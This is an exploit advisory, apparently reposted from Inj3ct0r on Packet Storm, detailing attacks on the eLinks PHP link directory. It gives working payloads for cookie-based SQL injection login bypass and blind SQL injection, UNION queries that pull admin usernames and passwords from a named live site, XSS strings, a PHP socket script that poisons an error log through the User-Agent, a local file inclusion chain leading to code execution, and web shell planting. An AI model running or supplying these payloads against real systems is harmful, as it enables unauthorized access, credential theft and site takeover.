eLinks suffers from remote blind SQL injection, cross site scripting, and local file inclusion vulnerabilities.
75f479a1564d2b980b5f8739423c0eb5c0a094d43eb85fbdada6dd6f263bf614=====================================================================
[eLinks] Vulnerabilities [blind sql inj / xss / LFI] by Inj3ct0r.com
=====================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
# 1 [Bypass Authentication]
Necessary condition: magic_quotes_gpc = Off
The first thing I decided to check the admin login panel (http:// [elinks] / asm_admin.php) to filter the fields.
But unfortunately, all the POST-data filtering built setGPC.
[core/asm_config.php]
PHP code:
function setGPC (&$array)
{ // begin function: setGPC
foreach ($array as $key => $value) {
if (true == is_array($value)) {
setGPC($array[$key]);
} else {
$array[$key] = addslashes($value);
}
}
reset($array);
} // end function: setGPC
---------------------------
if (!get_magic_quotes_gpc()) {
setGPC($_POST);
reset($_POST);
}
As we have seen, only POST-filtered data, which can not but rejoice.
Then I began to explore the algorithm authentication (user authentication).
[core/asm_function.php]
PHP code:
function auth ()
{
global $api;
$session = @$_COOKIE['acore'];
if ($session != '' && $session != '-1')
{
if (true == isset($_SESSION['user']['groups'])) { return true; }
$rs = $api->DB->query("SELECT * FROM asm_s_members WHERE session = '".$session."' LIMIT 1");
if ($rs->count() == 1)
{
$_SESSION['user'] = $rs->row();
$api->DB->query("UPDATE asm_s_members SET atime = '".time()."' WHERE session = '".$session."' LIMIT 1");
return true;
}
}
setAuth(0);
}
Authentication is carried out by COOKIE-variable acore.
Defined by the variable value:
word' OR member_id = '1
Receives a request:
SELECT * FROM asm_s_members WHERE session = 'word' OR member_id = '1' LIMIT 1
As the session with the name of 'word' can not exist, there is sample data administrator (member_id = 1).
Refreshes your page and appear in the admin panel.
As a result, even without knowing the username, we can login as any user.
# 2 Blind sql inj3ct0r in search of:
Necessary condition: magic_quotes_gpc = Off
http://www.***.com/eLinks-search.php?action=search&word=asian'+or+1=1+and+substring(version(),1,1)=5--+1
Shell :
In the admin go to template editor, to edit the templates do not have enough rights, but it can create the files:
In sortsah in the form of changing the hidden field with the name of the file to:
<input type = "hidden" name = "template_name" value ="../../../../../ home / tgp /***/ links/1.php ">
Getting shell.
# XSS :
/v2/searcherror.php?errormsg=<script>alert(/asd/);</script>
eLinks-search.php?action=result&word=%3Cscript%3Ealert('xss');%3C/script%3E&user_key=1601668980&page=1&pages=-0
# Sql inj3ct0r :
...modules/content/pub.content.php?url=/celebs/view&view=[sql inj]
sample:
http://yobt.com/modules/content/pub.content.php?url=/celebs/view&view=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(user_login,3x0a,user_pass),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+asm_s_members+limit+0,1/*
# Elinks LFI :
1. Login in asm_admin.php with any username and password;
2. get the message about wrong password, but, nevertheless, $ _SESSION [ 'user'] [ 'member_id']) becomes equal to 0
3../core/asm_config.php :
PHP code:
if ( strpos($_SERVER['HTTP_USER_AGENT'], 'vdebug') ) { set_error_handler('error_handler'); }
function error_handler ($errno, $errmsg, $filename, $linenum, $vars)
{ // BEGIN function
if ($errno == 2048 || error_reporting() == 0) { return true; }
$error_file = $_SERVER['DOCUMENT_ROOT'].'/files/logs/error.xml';
$_request_url = (true == isset($_SERVER['REQUEST_URI'])) ? 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'] : 'http://'.$_SERVER['HTTP_HOST'].'/';
$_http_referer = (true == isset($_SERVER['HTTP_REFERER'])) ? $_SERVER['HTTP_REFERER'] : '';
$_remote_addr = (true == isset($_SERVER['REMOTE_ADDR'])) ? $_SERVER['REMOTE_ADDR'] : '';
$_http_user_agent = (true == isset($_SERVER['HTTP_USER_AGENT'])) ? $_SERVER['HTTP_USER_AGENT'] : '';
$error_content = '
<error date="'.date("Y-m-d H:i:s").'">
<request_url>'.$_request_url.'</request_url>
<http_referer>'.$_http_referer.'</http_referer>
<remote_addr>'.$_remote_addr.'</remote_addr>
<http_user_agent>'.$_http_user_agent.'</http_user_agent>
<error_number>'.$errno.'</error_number>
<error_message>'.$errmsg.'</error_message>
<file_name>'.$filename.'</file_name>
<line_number>'.$linenum.'</line_number>
</error>
</xml>';
$fp = @fopen($error_file, 'r+');
if ($fp) {
$cursor_position = filesize($error_file)-7;
fseek($fp, $cursor_position);
fwrite($fp, $error_content);
fclose($fp);
} else {
$fp = fopen($error_file, 'w');
if ($fp) {
fwrite($fp, "<xml>\n".$error_content);
fclose($fp);
}
}
4. under this code a http packet with the help of a script:
PHP code:
<?
set_time_limit (0);
$site='yobt.com';
$path='/asm_admin.php?update=1';
$fp = fsockopen($site, 80, $errno, $errstr, 30);
$out = "GET $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-type: application/x-www-form-urlencoded\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: Opera vdebug <?php phpinfo() ?>\r\n"; //òóò íàø êîä äëÿ èíêëóäà
$out .= "Referer: http://laa.com\r\n";
$out .= "Cookie: 1=2;\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp))
{
print fread($fp, 4800);
}
print $out;
?>
instead asm_admin.php? update = 1 any other file that generates the error pohape (for this site come http://yobt.com/asm.pornstars.search.php);
5. my phpinfo, as prescribed in the code, added to. / files / logs / error.xml;
6. in. / asm_clean.php passes authentication :
PHP code:
if (isset($_SESSION['user']['member_id']) != '1' && SERVER_IP != $_SERVER['REMOTE_ADDR']) {
die('Access denied');
}
(so as login prior to the admin and the variable $ _SESSION [ 'user'] [ 'member_id'] exists);
7. go below code and see
PHP code:
if (false == isset($_GET['asm'])) { die('Map command not found'); }
$file = base64_decode($_GET['asm']);
...
include(PATH.$file);
8. only include our error.xml =)
http://yobt.com/asm_clean.php?asm=L2ZpbGVzL2xvZ3MvZXJyb3IueG1s link to see the withdrawal of phpinfo (unless, of course, authorized, as I wrote above)
--------------------------------------------------------------------------
Elinks arbitrary code execution
(for this site is not suitable, because admins removed from the distribution default file. / core / asm_xml_content.php, but still)
1. ./core/asm_xml_content.php
PHP code:
<?php
error_reporting(7);
$page = (true == isset($_GET['page'])) ? $_GET['page'] : 'index';
$page = $_SERVER['DOCUMENT_ROOT'].'/files/tpl/'.$page.'.xml';
if (true == file_exists($page)) {
$filemtime = filemtime($page);
$filemtime = ($filemtime > 10000) ? $filemtime : time()+3600;
$fp = fopen($page, 'r');
$content = fread($fp, filesize($page));
fclose($fp);
$content = "?>".$content."<?php ";
ob_start();
eval ($content);
2. Add in. / Files / error.xml our pohape manner described above;
3. Out of our code through http://elinks/core/asm_xml_content.php?page=../logs/error
-----------------------------------------
Local include :
core/xmlrpc.php
PHP code:
$xmlrpc_server = trim( $_GET['xmlrpc_server'] );
$uri = parse_url( $_SERVER['REQUEST_URI'] );
if ( $uri['query'] )
{
parse_str( $uri['query'], $_GET );
}
if ( true == is_file( PATH."/modules/".$xmlrpc_server."/xmlrpc_server.php" ) )
{
include_once( PATH."/modules/".$xmlrpc_server."/xmlrpc_server.php" );
As we can see the data from $ _GET [ 'xmlrpc_server'], without any filtering into include
Example:
<div class = "smallfont" style = "m
Get shell :
Get shell can also be via the Content Manager-> Content Blocks
Adding a new block:
Name: whatever
Alias: s.php
Content: <? Php phpinfo ();?>
Status: inactive
Get Shell: /files/blocks/.s.php
ThE End =] Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net
# ~ - [ [ : Inj3ct0r : ] ]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed